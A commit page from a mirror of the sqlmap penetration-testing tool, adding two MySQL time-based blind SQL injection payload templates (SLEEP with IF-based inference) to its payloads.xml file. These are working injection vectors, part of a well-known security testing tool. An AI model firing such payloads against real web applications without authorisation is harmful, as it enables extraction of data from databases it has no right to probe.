sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-01-23 15:54:24 +03:00
Code Issues Packages Projects Releases Wiki Activity

added a time-based payload for MySQL when the simpler AND SLEEP(X) does not work

Browse Source
This commit is contained in:
Bernardo Damele 2015-02-03 15:14:41 +00:00
parent eecc0b924b
commit 66c2a79397
1 changed files with 41 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
xml/payloads.xml
View File

@ -2454,6 +2454,47 @@ Formats:
<!-- AND time-based blind tests -->
<test>
<title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt; 5.0.11 AND time-based blind</title>
<stype>5</stype>